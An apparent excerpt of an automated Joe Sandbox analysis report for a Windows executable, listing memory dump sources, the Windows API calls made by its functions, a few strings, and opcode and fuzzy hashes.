                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2912839123-0
                                                                                        • Opcode ID: 8fc8b3a629483fc6f36b0b349d94c078e113b5cac70ce2541e49982725d63c6b
                                                                                        • Instruction ID: b43e1eb8d6a8f02b3d96bbbb0113684727658628ca061b55c15a3264066500c0
                                                                                        • Opcode Fuzzy Hash: 8fc8b3a629483fc6f36b0b349d94c078e113b5cac70ce2541e49982725d63c6b
                                                                                        • Instruction Fuzzy Hash: 1451B562F1465284FB00EB65DC453AE6322BF597A4FD02636DA5C17BE6EF6CD441C320
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                        • String ID:
                                                                                        • API String ID: 1452418845-0
                                                                                        • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                        • Instruction ID: 0847ff5d281e8dfee709b424c5064b45e7694573f86054be5ec2a748599f683a
                                                                                        • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                        • Instruction Fuzzy Hash: 57316010E0E18341FA55BB65EC553BAE291AF6D344FC47438EA8E4B2E3DF6CB8448271
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2359106489-0
                                                                                        • Opcode ID: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
                                                                                        • Instruction ID: d382fff190c69b45bc8553db68b77e896d773689fdf3d116ab909ed65ec8ba61
                                                                                        • Opcode Fuzzy Hash: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
                                                                                        • Instruction Fuzzy Hash: 9F319566A0C68251EA20BB35E884279E361FF8D7A0FD42231EE9D437D5DF3CE4858610
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                        • String ID:
                                                                                        • API String ID: 2244327787-0
                                                                                        • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                        • Instruction ID: 072bb7127c1e7dc8d98e82753f6e90251160dd19edc463c4a89f635d831b21d5
                                                                                        • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                        • Instruction Fuzzy Hash: 7A219222A0C582D1EA60BB31FC00239E3A4FF49B94F946534DA5D466A6CF7CE8858761
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E79ECD8: ResetEvent.KERNEL32 ref: 00007FF70E79ECF1
                                                                                          • Part of subcall function 00007FF70E79ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF70E79ED07
                                                                                        • ReleaseSemaphore.KERNEL32 ref: 00007FF70E79E974
                                                                                        • CloseHandle.KERNELBASE ref: 00007FF70E79E993
                                                                                        • DeleteCriticalSection.KERNEL32 ref: 00007FF70E79E9AA
                                                                                        • CloseHandle.KERNEL32 ref: 00007FF70E79E9B7
                                                                                          • Part of subcall function 00007FF70E79EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA63
                                                                                          • Part of subcall function 00007FF70E79EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 502429940-0
                                                                                        • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                        • Instruction ID: 64d801e9204cd30a91a094671f452fe93be545e53b2beba1c8e73095303bf178
                                                                                        • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                        • Instruction Fuzzy Hash: B101E933A18A91A3E648EB21E94426DA365FF88BA0F405035DB6E03665CF39F4F58751
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CreatePriority
                                                                                        • String ID: CreateThread failed
                                                                                        • API String ID: 2610526550-3849766595
                                                                                        • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                        • Instruction ID: e67c14ac9e77ffaa725fc4936324a750ce449dccb15686c50d615e82b3f1c301
                                                                                        • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                        • Instruction Fuzzy Hash: E0116031A08A4281E704EB10EC411B9F3B0FF8C794F945136D64D42668EF7CE586C720
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInitializeMallocSystem
                                                                                        • String ID: riched20.dll
                                                                                        • API String ID: 174490985-3360196438
                                                                                        • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                        • Instruction ID: 09cb6ffa45c807a4af9bbc6201ba7cfab9a157fea8cb15b4a96922d126ee0cee
                                                                                        • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                        • Instruction Fuzzy Hash: 3FF04F71618A8182EB10AF60F81526AF3A0FF8C758F801135EA8E46B64DF7CD189CB10
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E7A853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF70E7A856C
                                                                                          • Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB67
                                                                                          • Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB80
                                                                                          • Part of subcall function 00007FF70E781FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781FFB
                                                                                          • Part of subcall function 00007FF70E78129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E781396
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B01BB
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B01C1
                                                                                        • SendDlgItemMessageW.USER32 ref: 00007FF70E7B01F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                        • String ID:
                                                                                        • API String ID: 3106221260-0
                                                                                        • Opcode ID: 8c360d5f5e245417109053446ee31c3b82c6562e62a189eed3094808beb71bb9
                                                                                        • Instruction ID: 44adcdaa541c66796ae9d35688605a2a3c8b9a01c9e9525ccf081569af60bd8c
                                                                                        • Opcode Fuzzy Hash: 8c360d5f5e245417109053446ee31c3b82c6562e62a189eed3094808beb71bb9
                                                                                        • Instruction Fuzzy Hash: D451D062F0564686FB04ABA1D8452FDA322AF9DB88F802236DA4D5B7D6DF2CD401C360
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID:
                                                                                        • API String ID: 47109696-0
                                                                                        • Opcode ID: 3d7106c7d5ccef62372c9b37b0d8b2bcd6c4040773d7db820f5012b29da06867
                                                                                        • Instruction ID: 88d11834addd09f9d1980eac1f41f5ac588cf41f652c6d915779f9fa7775cf93
                                                                                        • Opcode Fuzzy Hash: 3d7106c7d5ccef62372c9b37b0d8b2bcd6c4040773d7db820f5012b29da06867
                                                                                        • Instruction Fuzzy Hash: 0B51BE22B14A0685EF20EF65D8442AD63B1FF8CBC8B886536DE5D53B98DF38D080C350
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2272807158-0
                                                                                        • Opcode ID: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
                                                                                        • Instruction ID: fc4c8613481179c66b1376904425e183921dca3e5cdd80032eceb209b9c39686
                                                                                        • Opcode Fuzzy Hash: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
                                                                                        • Instruction Fuzzy Hash: B341A77261878192EB14AB25F844269A3A1FF887B4F506335DFAD07AE5CF3CE4948710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2176759853-0
                                                                                        • Opcode ID: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
                                                                                        • Instruction ID: 8386e4a21697060e7cc27b45363736f936f14241efebb4146f1bc2a46998bdab
                                                                                        • Opcode Fuzzy Hash: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
                                                                                        • Instruction Fuzzy Hash: CA21A272A19B8181EA14AB65E94017AB364FF9DBD0F946236EBDD03BA5DF3CD181C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: std::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1875163511-0
                                                                                        • Opcode ID: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
                                                                                        • Instruction ID: 58e3a4b967fe2bec544cc5dbae485c469c6a0ec888b6c40237edcde6ee2acedb
                                                                                        • Opcode Fuzzy Hash: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
                                                                                        • Instruction Fuzzy Hash: 12319252A0D68651FB24B714F8443BAE3A0FF98784FD85031D28C069AADF7CE946C311
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1203560049-0
                                                                                        • Opcode ID: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
                                                                                        • Instruction ID: c8ba6be025de1d7e1538d5dcc91985d5006f3a392ef4d8ffebe1abbac07dad8d
                                                                                        • Opcode Fuzzy Hash: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
                                                                                        • Instruction Fuzzy Hash: EE21C822A1868181FA20AF35FC5526AA361FF8CB94F906235EA9D47699DF3CD580C610
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3118131910-0
                                                                                        • Opcode ID: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
                                                                                        • Instruction ID: 01940714dd4ca82cb69594ee43cf1cf4dc25f06977888beb9cb9739c2d8a91e5
                                                                                        • Opcode Fuzzy Hash: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
                                                                                        • Instruction Fuzzy Hash: 81218822A18B8181FA10AB25F84526EA360FF8DB94F902335EADE466A5DF3CE540C610
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1203560049-0
                                                                                        • Opcode ID: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
                                                                                        • Instruction ID: 3986770bdc844912c66567b6d7f1523e6c91e655d6264780cc8843cb475a2eeb
                                                                                        • Opcode Fuzzy Hash: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
                                                                                        • Instruction Fuzzy Hash: 19218632A1878181EA10AB29F844229A361FFCDBA4F902331EADD47BE5DF3CD580C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                        • Instruction ID: 977ed9c726cb9d9b944a972f788eaa32a68581248c5f32f6e76448dc02624fee
                                                                                        • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                        • Instruction Fuzzy Hash: E3E01A24B043054AFA587B31DC95379A3566F9CB51F50643CDC8E02396CF3DE4898621
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F895
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F89B
                                                                                          • Part of subcall function 00007FF70E793EC8: FindClose.KERNEL32(?,?,00000000,00007FF70E7A0811), ref: 00007FF70E793EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
